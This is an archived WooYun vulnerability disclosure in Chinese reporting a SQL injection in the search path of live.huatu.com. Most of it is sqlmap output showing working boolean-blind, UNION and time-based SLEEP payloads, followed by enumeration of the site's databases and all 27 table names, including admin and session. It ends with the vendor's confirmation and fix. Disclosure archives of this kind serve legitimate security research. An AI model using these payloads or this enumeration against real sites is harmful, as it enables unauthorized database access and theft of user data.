乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-07-04: 细节已通知厂商并且等待厂商处理中 2016-07-05: 厂商已经确认,细节仅向厂商公开 2016-07-05: 厂商已经修复漏洞并主动公开,细节向公众公开
RT
http://wooyun.org/bugs/wooyun-2016-0222995
接上大牛的继续
注入处:http://live.huatu.com/Search/index/fx/index
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://live.huatu.com:80/Search/index/fx/index') AND 9438=9438 AND('XXvg'='XXvg Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://live.huatu.com:80/Search/index/fx/index') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a64646a3a,0x6f6a6f57457a6b4a4142,0x3a796e783a), NULL, NULL-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://live.huatu.com:80/Search/index/fx/index') AND SLEEP(5) AND ('ayvC'='ayvC---[16:37:02] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[16:37:02] [WARNING] HTTP error codes detected during testing:404 (Not Found) - 1 times[16:37:02] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[16:37:02] [INFO] fetched data logged to text files under 'C:\DOCUME~1\xiaolu\??\SQLMAP~1\SQLMAP~1\Bin\output\live.huatu.com'
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://live.huatu.com:80/Search/index/fx/index') AND 9438=9438 AND('XXvg'='XXvg Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://live.huatu.com:80/Search/index/fx/index') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a64646a3a,0x6f6a6f57457a6b4a4142,0x3a796e783a), NULL, NULL-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://live.huatu.com:80/Search/index/fx/index') AND SLEEP(5) AND ('ayvC'='ayvC---[16:37:11] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[16:37:11] [INFO] fetching database names[16:37:11] [INFO] the SQL query used returns 3 entries[16:37:11] [INFO] retrieved: "information_schema"[16:37:12] [INFO] retrieved: "live"[16:37:12] [INFO] retrieved: "test"available databases [3]:[*] information_schema[*] live[*] test[16:37:13] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[16:37:13] [INFO] fetched data logged to text files under 'C:\DOCUME~1\xiaolu\??\SQLMAP~1\SQLMAP~1\Bin\output\live.huatu.com'
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://live.huatu.com:80/Search/index/fx/index') AND 9438=9438 AND('XXvg'='XXvg Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://live.huatu.com:80/Search/index/fx/index') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a64646a3a,0x6f6a6f57457a6b4a4142,0x3a796e783a), NULL, NULL-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://live.huatu.com:80/Search/index/fx/index') AND SLEEP(5) AND ('ayvC'='ayvC---[16:37:52] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[16:37:52] [INFO] fetching tables for database: 'live'[16:37:52] [INFO] the SQL query used returns 27 entries[16:37:52] [INFO] retrieved: "admin"[16:37:52] [INFO] retrieved: "dede_addoncrm"[16:37:53] [INFO] retrieved: "dede_live_shengcheng"[16:37:53] [INFO] retrieved: "fenxiao"[16:37:53] [INFO] retrieved: "fufei"[16:37:53] [INFO] retrieved: "live_tongbu"[16:37:53] [INFO] retrieved: "livepl"[16:37:53] [INFO] retrieved: "new_teacher"[16:37:54] [INFO] retrieved: "new_tv"[16:37:54] [INFO] retrieved: "session"[16:37:54] [INFO] retrieved: "testbiao"[16:37:54] [INFO] retrieved: "tv_ads"[16:37:54] [INFO] retrieved: "tv_blacklist"[16:37:54] [INFO] retrieved: "tv_category"[16:37:55] [INFO] retrieved: "tv_dianzan"[16:37:55] [INFO] retrieved: "tv_flowers"[16:37:55] [INFO] retrieved: "tv_fufei"[16:37:55] [INFO] retrieved: "tv_jilu"[16:37:55] [INFO] retrieved: "tv_live_accept"[16:37:56] [INFO] retrieved: "tv_member"[16:37:56] [INFO] retrieved: "tv_sc"[16:37:56] [INFO] retrieved: "tv_yuyue"[16:37:56] [INFO] retrieved: "v1"[16:37:56] [INFO] retrieved: "wb_fenxiao"[16:37:56] [INFO] retrieved: "wb_tv"[16:37:57] [INFO] retrieved: "wb_tv_view"[16:37:57] [INFO] retrieved: "web_teacher"Database: live[27 tables]+----------------------+| admin || dede_addoncrm || dede_live_shengcheng || fenxiao || fufei || live_tongbu || livepl || new_teacher || new_tv || session || testbiao || tv_ads || tv_blacklist || tv_category || tv_dianzan || tv_flowers || tv_fufei || tv_jilu || tv_live_accept || tv_member || tv_sc || tv_yuyue || v1 || wb_fenxiao || wb_tv || wb_tv_view || web_teacher |+----------------------+[16:37:57] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.[16:37:57] [INFO] fetched data logged to text files under 'C:\DOCUME~1\xiaolu\??\SQLMAP~1\SQLMAP~1\Bin\output\live.huatu.com'
~
危害等级:中
漏洞Rank:7
确认时间:2016-07-05 17:34
已经添加过滤
2016-07-05:已经添加过滤